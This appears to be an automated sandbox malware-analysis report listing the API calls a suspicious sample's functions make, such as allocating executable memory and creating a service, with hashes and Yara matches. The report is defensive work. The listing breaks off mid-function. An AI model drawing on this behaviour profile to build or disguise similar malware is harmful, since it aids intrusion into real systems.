                                                    • Source File: 00000007.00000002.2646165637.00000000016A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_16a1000_cv viewer plugin 8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExceptionException@8H_prologRaiseThrow
                                                    • String ID:
                                                    • API String ID: 1681477883-0
                                                    • Opcode ID: 1377b7e7e419b85d79bc84c810e583a8ce1fb70d1ed667b5ae4691848f5279da
                                                    • Instruction ID: b4d68ff79a330bb3d9f3a8065ba034bb3c582c744defaf77427c558f8c5f449b
                                                    • Opcode Fuzzy Hash: 1377b7e7e419b85d79bc84c810e583a8ce1fb70d1ed667b5ae4691848f5279da
                                                    • Instruction Fuzzy Hash: ABF0C2719102096FD718ABEDCC45CEB73EDEB08214B40055DF60793600EAA1F8048BA5
                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 016AE556
                                                      • Part of subcall function 016A26DB: RtlEnterCriticalSection.NTDLL(?), ref: 016A2706
                                                      • Part of subcall function 016A26DB: CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 016A272B
                                                      • Part of subcall function 016A26DB: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,016C5B53), ref: 016A2738
                                                      • Part of subcall function 016A26DB: SetWaitableTimer.KERNELBASE(?,?,000493E0,00000000,00000000,00000000), ref: 016A2778
                                                      • Part of subcall function 016A26DB: RtlLeaveCriticalSection.NTDLL(?), ref: 016A27D9
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2646165637.00000000016A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_16a1000_cv viewer plugin 8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                    • String ID:
                                                    • API String ID: 4293676635-0
                                                    • Opcode ID: fd87b1198cce50f6f5c9b44de2b56510c5713c64fa729c302e09123c4edad43d
                                                    • Instruction ID: 86439b6576e879bcd08aa4577aa2e4ecca66b1f823c098302de15ed8cdb14836
                                                    • Opcode Fuzzy Hash: fd87b1198cce50f6f5c9b44de2b56510c5713c64fa729c302e09123c4edad43d
                                                    • Instruction Fuzzy Hash: 52019EB1901B149FC718CF5AC940966FBE5EF88610B15C6AE94498B721E771AA40CF94
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2643509901.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000007.00000002.2643509901.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_400000_cv viewer plugin 8.jbxd
                                                    Similarity
                                                    • API ID: LibraryLoad
                                                    • String ID:
                                                    • API String ID: 1029625771-0
                                                    • Opcode ID: d13eb9cb13540e1e847e8eef21160c3bec02b9ffeb60afac02ed4b80adb5d1d8
                                                    • Instruction ID: ebd0d10bb02d034d75afe87da7d4fa486092849ccf3fbf152faa1252f0ef59d6
                                                    • Opcode Fuzzy Hash: d13eb9cb13540e1e847e8eef21160c3bec02b9ffeb60afac02ed4b80adb5d1d8
                                                    • Instruction Fuzzy Hash: 44F05E71A043448FDB00DFB8D8D06D53BF4BB06620B5545A6EC64E7295D374C94A8A65
                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 016AE335
                                                      • Part of subcall function 016B3B4C: _malloc.LIBCMT ref: 016B3B64
                                                      • Part of subcall function 016AE551: __EH_prolog.LIBCMT ref: 016AE556
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2646165637.00000000016A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_16a1000_cv viewer plugin 8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: H_prolog$_malloc
                                                    • String ID:
                                                    • API String ID: 4254904621-0
                                                    • Opcode ID: 2ac50a534d940fec190d2f7a24c671f2c55a962e82cde7fb150b5e3da93b8ccf
                                                    • Instruction ID: 977ab259d63678e28e232a24b468de3f0eaacf0ed92f00978716102e8d29b4b7
                                                    • Opcode Fuzzy Hash: 2ac50a534d940fec190d2f7a24c671f2c55a962e82cde7fb150b5e3da93b8ccf
                                                    • Instruction Fuzzy Hash: 66E08CB1A00106ABDB089F68DC0077EBBA2EB14B00F0042ADB80A92340EB7199008A28
                                                    APIs
                                                      • Part of subcall function 016B5C5A: __getptd_noexit.LIBCMT ref: 016B5C5B
                                                      • Part of subcall function 016B5C5A: __amsg_exit.LIBCMT ref: 016B5C68
                                                      • Part of subcall function 016B3493: __getptd_noexit.LIBCMT ref: 016B3497
                                                      • Part of subcall function 016B3493: __freeptd.LIBCMT ref: 016B34B1
                                                      • Part of subcall function 016B3493: RtlExitUserThread.NTDLL(?,00000000,?,016B3473,00000000), ref: 016B34BA
                                                    • __XcptFilter.LIBCMT ref: 016B347F
                                                      • Part of subcall function 016B8D94: __getptd_noexit.LIBCMT ref: 016B8D98
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2646165637.00000000016A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_16a1000_cv viewer plugin 8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: __getptd_noexit$ExitFilterThreadUserXcpt__amsg_exit__freeptd
                                                    • String ID:
                                                    • API String ID: 1405322794-0
                                                    • Opcode ID: 2df02558b07a9f52fdc7659dc843cc2c4b090293944409c17459f5c2150b368e
                                                    • Instruction ID: 94641094ef81857f399bc9be333783fb3426189968d327a3765abd384330d28d
                                                    • Opcode Fuzzy Hash: 2df02558b07a9f52fdc7659dc843cc2c4b090293944409c17459f5c2150b368e
                                                    • Instruction Fuzzy Hash: 68E0ECB5A016029FDB08EBE1DD89EAD776AAF55201F20014DE1029B261CB78A9809B24
                                                    APIs
                                                      • Part of subcall function 016B1610: OpenEventA.KERNEL32(00100002,00000000,00000000,DA1F4857), ref: 016B16B0
                                                      • Part of subcall function 016B1610: CloseHandle.KERNEL32(00000000), ref: 016B16C5
                                                      • Part of subcall function 016B1610: ResetEvent.KERNEL32(00000000,DA1F4857), ref: 016B16CF
                                                      • Part of subcall function 016B1610: CloseHandle.KERNEL32(00000000,DA1F4857), ref: 016B1704
                                                    • TlsSetValue.KERNEL32(00000029,?), ref: 016B21AA
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2646165637.00000000016A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_16a1000_cv viewer plugin 8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CloseEventHandle$OpenResetValue
                                                    • String ID:
                                                    • API String ID: 1556185888-0
                                                    • Opcode ID: eaa2417a4923d3a70f1d7283583a52d55fff6b03c3877ae5aeba35f115025467
                                                    • Instruction ID: 741b0b8be2dcfb491352c166a8477c4cba173c4c77e74c87a6dfbe5a8ae43f66
                                                    • Opcode Fuzzy Hash: eaa2417a4923d3a70f1d7283583a52d55fff6b03c3877ae5aeba35f115025467
                                                    • Instruction Fuzzy Hash: 8D018FB5A00204AFC720CF5AEC45B9ABBA8FB09660F10462EF825D3380D7316910CBA5
                                                    APIs
                                                    • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,0040909C), ref: 0040D6D1
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2643509901.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000007.00000002.2643509901.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_400000_cv viewer plugin 8.jbxd
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID:
                                                    • API String ID: 4275171209-0
                                                    • Opcode ID: 550ca5e8760dc3f2ecab85525b79827c5fd9d3b9d234291476c1ddb6f3ae41e1
                                                    • Instruction ID: 5d8bad613ceaf0eb8ff6cfe18aa91962f519422e778415206d31264555270ba6
                                                    • Opcode Fuzzy Hash: 550ca5e8760dc3f2ecab85525b79827c5fd9d3b9d234291476c1ddb6f3ae41e1
                                                    • Instruction Fuzzy Hash: 07E02B31945604FBD7101A648C05F517B26AB84755F124331FE1D371D1C7786C2A969A
                                                    APIs
                                                    • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,0040909C), ref: 0040D6D1
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2643509901.000000000040B000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000007.00000002.2643509901.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_400000_cv viewer plugin 8.jbxd
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID:
                                                    • API String ID: 4275171209-0
                                                    • Opcode ID: 691b312047ca6c280f993980f6f3b505f7d7f3a3bd3da08424b5215a69a52de9
                                                    • Instruction ID: 05e88d9dbfae65098e0e7a07f6b25079b155f6813d2052da05805f44e4370fcf
                                                    • Opcode Fuzzy Hash: 691b312047ca6c280f993980f6f3b505f7d7f3a3bd3da08424b5215a69a52de9
                                                    • Instruction Fuzzy Hash: E9E06831949700EFD7000F608C10B90BB72AF44360F070322E91D3B1D2C3782C2A9B05
                                                    APIs
                                                    • Sleep.KERNELBASE(000003E8), ref: 004022B6
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2643509901.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000007.00000002.2643509901.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_400000_cv viewer plugin 8.jbxd
                                                    Similarity
                                                    • API ID: Sleep
                                                    • String ID:
                                                    • API String ID: 3472027048-0
                                                    • Opcode ID: 2a1f0ebb6a8bb7ff01fc6bddb88a9b6588bb5e47706fbf076fb93800423b80e2
                                                    • Instruction ID: 95d59ba1a353b8b0930a5635e85a18935a862e96ed8482421881c3e33da25bbd
                                                    • Opcode Fuzzy Hash: 2a1f0ebb6a8bb7ff01fc6bddb88a9b6588bb5e47706fbf076fb93800423b80e2
                                                    • Instruction Fuzzy Hash: C0C08C30945600FBD2025F94CE08F7C7728BF08300F210036B20AB90D0CBB86A0BA76E
                                                    APIs
                                                    • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,0040909C), ref: 0040D6D1
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2643509901.000000000040B000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000007.00000002.2643509901.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_400000_cv viewer plugin 8.jbxd
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID:
                                                    • API String ID: 4275171209-0
                                                    • Opcode ID: 2c56cf54f504ebf5c55dad4f3a631a81fc7fff3296d38a31c00063f97d477698
                                                    • Instruction ID: 9dc2575647716a050a205b35a816bc804047933f7207a33aca4f8a7fc5551071
                                                    • Opcode Fuzzy Hash: 2c56cf54f504ebf5c55dad4f3a631a81fc7fff3296d38a31c00063f97d477698
                                                    • Instruction Fuzzy Hash: F7C04C2180D681AFC31617B05B38450BF307A0625831A86A6D44AA54928739495FE75A
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2643509901.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000007.00000002.2643509901.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_400000_cv viewer plugin 8.jbxd
                                                    Similarity
                                                    • API ID: Sleep
                                                    • String ID:
                                                    • API String ID: 3472027048-0
                                                    • Opcode ID: a3b3cfab0810625a53ece333970bec8ee003110a8e510299c27105383bf176dc
                                                    • Instruction ID: e46333d11de712cc79b33e700053c1f071bda6255ef7a49011afa96c8f2a9f8e
                                                    • Opcode Fuzzy Hash: a3b3cfab0810625a53ece333970bec8ee003110a8e510299c27105383bf176dc
                                                    • Instruction Fuzzy Hash: 2BB09231D0A501EAD2112BF06E04B243B246709744F24483BAA0BB10E8DA7A440F6A2F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2643509901.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000007.00000002.2643509901.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_400000_cv viewer plugin 8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: +$+$-$-$0$0$0$0$0$1$1$9$9$9$9$9$9$C$E$c$e
                                                    • API String ID: 0-1157002505
                                                    • Opcode ID: 2264ed1eeb04cd628dd7ecbe5a7ea4b96a7455e1980619db826b3964a44db27c
                                                    • Instruction ID: ae37707e7a9e20bf572dd68ae991a4076710a32e704508819d40079b4272058c
                                                    • Opcode Fuzzy Hash: 2264ed1eeb04cd628dd7ecbe5a7ea4b96a7455e1980619db826b3964a44db27c
                                                    • Instruction Fuzzy Hash: 36E1E230E5920A8EEB24CF54D9057BE7BB5EB44304F29403BE442B62C1C77D99A2DB5E
                                                    APIs
                                                    • FormatMessageA.KERNEL32(00001200,00000000,?,00000400,?,00000010,00000000), ref: 016B09A2
                                                    • GetLastError.KERNEL32(?,00000400,?,00000010,00000000), ref: 016B09AA
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2646165637.00000000016A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_16a1000_cv viewer plugin 8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorFormatLastMessage
                                                    • String ID:
                                                    • API String ID: 3479602957-0
                                                    • Opcode ID: dd03867116efb9cd43d4c093e92a77269bfb8257ad90c17feacd3712422c3611
                                                    • Instruction ID: b997feabe9713c13566f6c3555f241acba2ad60f8ef6a05f270eec6075fd7989
                                                    • Opcode Fuzzy Hash: dd03867116efb9cd43d4c093e92a77269bfb8257ad90c17feacd3712422c3611
                                                    • Instruction Fuzzy Hash: 25F09030208341CFEB15CA28CC91B6FBBF4AB8C744F50492CF59692291E370D5858B17
                                                    APIs
                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,016B4E96,?,?,?,00000000), ref: 016B952D
                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,00000000), ref: 016B9536
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2646165637.00000000016A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_16a1000_cv viewer plugin 8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled
                                                    • String ID:
                                                    • API String ID: 3192549508-0
                                                    • Opcode ID: 0a9b106d737e5955f7e3a9ba4cde3461b5735560fcf7edefc6a8cf2c74922c83
                                                    • Instruction ID: 0798e567797c3878855b4bab686787edacf778f35687af3a591da3ecd4e7367f
                                                    • Opcode Fuzzy Hash: 0a9b106d737e5955f7e3a9ba4cde3461b5735560fcf7edefc6a8cf2c74922c83
                                                    • Instruction Fuzzy Hash: 4FB09279244208EFCB212F91EC09BA93F28EB04666F005410F60D440548B629420EFA1
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2643509901.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000007.00000002.2643509901.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_400000_cv viewer plugin 8.jbxd
                                                    Similarity
                                                    • API ID: CreateService
                                                    • String ID:
                                                    • API String ID: 1592570254-0
                                                    • Opcode ID: 7dcb501d6f26ef6048b8203431d11e7e7df1b82d3dfe0c5c023a80862715867a
                                                    • Instruction ID: 6a12e1419568bd4dde77bfe08bf1336b0284cce763a2789d4d1fd8c3da22f40c
                                                    • Opcode Fuzzy Hash: 7dcb501d6f26ef6048b8203431d11e7e7df1b82d3dfe0c5c023a80862715867a
                                                    • Instruction Fuzzy Hash: 01C04C35C48011EBCE346F905B4852937366740324B36857AD59BB31D0C7BD6E4FB66E
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2643509901.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000007.00000002.2643509901.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_400000_cv viewer plugin 8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c970d07b5a8736805000ccf49c2c3e0be1249f32b7b106dff15c019d43e397c2
                                                    • Instruction ID: c8bfbb54730352564b930089ec95ced814cd77ea998b2ca2cce047e86fd9f603
                                                    • Opcode Fuzzy Hash: c970d07b5a8736805000ccf49c2c3e0be1249f32b7b106dff15c019d43e397c2
                                                    • Instruction Fuzzy Hash: 1E520D37E4062A9BDB14CE9ACCC05C9B7A3AFC825475BC265CD58BB305D6B4BD06CAD0
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2646165637.00000000016A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_16a1000_cv viewer plugin 8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8565dba51f62ca82745c93959c5409f40a5920b3d56ea50adc44597dd0b8764c
                                                    • Instruction ID: 84f2ddf535e0b305667e0fc1eaa7a677a232d616235e0f268fbef1196e0916c4
                                                    • Opcode Fuzzy Hash: 8565dba51f62ca82745c93959c5409f40a5920b3d56ea50adc44597dd0b8764c
                                                    • Instruction Fuzzy Hash: 182210B3F211144BCB48CE6DCC927DAB6E3BFD821871E8539E809E7705E639D9158A84
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2646165637.00000000016A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_16a1000_cv viewer plugin 8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                    • Instruction ID: 3fbb004ef34d20151d9aee65aef4aa1a7b9cde541481917a4b7d77b8814aeee1
                                                    • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                    • Instruction Fuzzy Hash: 6AC161322051A349EB6E463D88B40FFBEE15A926B131A076DD5B6CB2D6FF11C1A4D720
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2646165637.00000000016A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_16a1000_cv viewer plugin 8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                    • Instruction ID: be12d2ed4c57e7286549919ac6c1ce9f808ecbd738674e85d9c9831f543938bc
                                                    • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                    • Instruction Fuzzy Hash: 52C1863220516349EF2E463D88B40FFBEE15A926B130A076DD5B7CB2C6FF25D1A49720
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2646165637.00000000016DA000.00000040.00001000.00020000.00000000.sdmp, Offset: 016DA000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_16da000_cv viewer plugin 8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 124e937f443d5656e3571fc542e7406159cc2236b06d51d1d8f6c95260a21abc
                                                    • Instruction ID: 6a5dcaba45cbf701f8a847a4a3d1342ba0df42b33d0696974bc9f6231aaf7327
                                                    • Opcode Fuzzy Hash: 124e937f443d5656e3571fc542e7406159cc2236b06d51d1d8f6c95260a21abc
                                                    • Instruction Fuzzy Hash: 46A1D531419791AFDF96EF7484852C3BBE2BF4B304796A5DDC8818F062C7226497EB81
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2643509901.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000007.00000002.2643509901.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_400000_cv viewer plugin 8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: af41b0c7e6cf134d524e8d64f6e4ae55e63b512cb5e841b2e55a01beb2b74a01
                                                    • Instruction ID: a42d24ad3a6fb18dd8d66be16c581d82c7a306d1cb0e87925171907ef8f84c95
                                                    • Opcode Fuzzy Hash: af41b0c7e6cf134d524e8d64f6e4ae55e63b512cb5e841b2e55a01beb2b74a01
                                                    • Instruction Fuzzy Hash: 30A1F6319081559BEB19CA98C0A07BD7B71EF41304F2880BEC8937B7E2C678D946D785
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2646165637.00000000016DA000.00000040.00001000.00020000.00000000.sdmp, Offset: 016DA000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_16da000_cv viewer plugin 8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 18065d89e0e1c8101376a4ee99de5a6116295034ea86d5add9c0711c4cf4d418
                                                    • Instruction ID: a426a40a65b3a2ffd73c8c2bf55898922059cc4f48d57b32a57e8f52e0471245
                                                    • Opcode Fuzzy Hash: 18065d89e0e1c8101376a4ee99de5a6116295034ea86d5add9c0711c4cf4d418
                                                    • Instruction Fuzzy Hash: D981E431419392AFDFA6EF7484952C3BFE2AF4B300796A5D9C8818B062C6215497FB81
                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 016A24E6
                                                    • InterlockedCompareExchange.KERNEL32(?,00000000,00000001), ref: 016A24FC
                                                    • RtlEnterCriticalSection.NTDLL(?), ref: 016A250E
                                                    • RtlLeaveCriticalSection.NTDLL(?), ref: 016A256D
                                                    • SetLastError.KERNEL32(00000000,?,76F8DFB0), ref: 016A257F
                                                    • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000001F4,?,76F8DFB0), ref: 016A2599
                                                    • GetLastError.KERNEL32(?,76F8DFB0), ref: 016A25A2
                                                    • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 016A25F0
                                                    • InterlockedDecrement.KERNEL32(00000002), ref: 016A262F
                                                    • InterlockedExchange.KERNEL32(00000000,00000000), ref: 016A268E
                                                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 016A2699
                                                    • InterlockedExchange.KERNEL32(00000000,00000001), ref: 016A26AD
                                                    • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,76F8DFB0), ref: 016A26BD
                                                    • GetLastError.KERNEL32(?,76F8DFB0), ref: 016A26C7
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2646165637.00000000016A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_16a1000_cv viewer plugin 8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Interlocked$Exchange$ErrorLast$CompareCompletionCriticalQueuedSectionStatus$DecrementEnterH_prologLeavePost
                                                    • String ID:
                                                    • API String ID: 1213838671-0
                                                    • Opcode ID: e2f218cd4719bb9e881257cc7e98f86a7e4bb7c33ce5b011fbc975e7db030ae2
                                                    • Instruction ID: 21278201b7979e10041900c0160b5f94cb94bcebdcec2a979be06591b7c4e469
                                                    • Opcode Fuzzy Hash: e2f218cd4719bb9e881257cc7e98f86a7e4bb7c33ce5b011fbc975e7db030ae2
                                                    • Instruction Fuzzy Hash: D0614DB5A01209AFCB21DFA8CD94AAEBBB9FF08310F50556EE556E3240D734A954CF60
                                                    APIs
                                                    • RtlDecodePointer.NTDLL(?), ref: 016B833B
                                                    • _free.LIBCMT ref: 016B8354
                                                      • Part of subcall function 016B2F74: HeapFree.KERNEL32(00000000,00000000,?,016B5CD2,00000000,?,?,?,00000000,?,016B89B8,00000018,016D16F8,00000008,016B8905,?), ref: 016B2F88
                                                      • Part of subcall function 016B2F74: GetLastError.KERNEL32(00000000,?,016B5CD2,00000000,?,?,?,00000000,?,016B89B8,00000018,016D16F8,00000008,016B8905,?,?), ref: 016B2F9A
                                                    • _free.LIBCMT ref: 016B8367
                                                    • _free.LIBCMT ref: 016B8385
                                                    • _free.LIBCMT ref: 016B8397
                                                    • _free.LIBCMT ref: 016B83A8
                                                    • _free.LIBCMT ref: 016B83B3
                                                    • _free.LIBCMT ref: 016B83D7
                                                    • RtlEncodePointer.NTDLL(00AAE180), ref: 016B83DE
                                                    • _free.LIBCMT ref: 016B83F3
                                                    • _free.LIBCMT ref: 016B8409
                                                    • _free.LIBCMT ref: 016B8431
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2646165637.00000000016A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 016A1000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_16a1000_cv viewer plugin 8.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 3064303923-0
                                                    • Opcode ID: 189d03a7a850f416433ad8b59adb744528252fc63fa49e73ab3c9fe878f810e3
                                                    • Instruction ID: acaa6808b5f2e2397d9aac3675e8fc47589ca511900aeb749d017d272185a9bc
                                                    • Opcode Fuzzy Hash: 189d03a7a850f416433ad8b59adb744528252fc63fa49e73ab3c9fe878f810e3
                                                    • Instruction Fuzzy Hash: 0421AB72D07222CBDB356F5DFDC05993BBDBB44220309122DE90493368CB35A8A4CFA4
                                                    APIs
                                                    • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00402F34), ref: 00403BBD
                                                    • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00402F34), ref: 00403BD1
                                                    • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00402F34), ref: 00403BFD
                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00402F34), ref: 00403C35
                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00402F34), ref: 00403C57
                                                    • FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,?,?,00402F34), ref: 00403C70
                                                    • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00402F34), ref: 00403C83
                                                    • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00403CC1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.2643509901.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000007.00000002.2643509901.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_400000_cv viewer plugin 8.jbxd
                                                    Similarity
                                                    • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                                                    • String ID: 4/@
                                                    • API String ID: 1823725401-3101945251
                                                    • Opcode ID: aff10945ecf90bbee9edc284fe0c12867232451494807f8f70b2732d2a40bc2d
                                                    • Instruction ID: a2970ceca2a6c3f976dc545d3d2173026391ae6ff2d108e1c7f08cdddd2a955e
                                                    • Opcode Fuzzy Hash: aff10945ecf90bbee9edc284fe0c12867232451494807f8f70b2732d2a40bc2d
                                                    • Instruction Fuzzy Hash: AD31F27350C1245EE7202F785DC883B7E9CEA4534A711093FF942F3380EA798E81466D
                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 016A3428
                                                    • GetModuleHandleA.KERNEL32(KERNEL32,CancelIoEx), ref: 016A346B
                                                    • GetProcAddress.KERNEL32(00000000), ref: 016A3472
                                                    • GetLastError.KERNEL32 ref: 016A3486
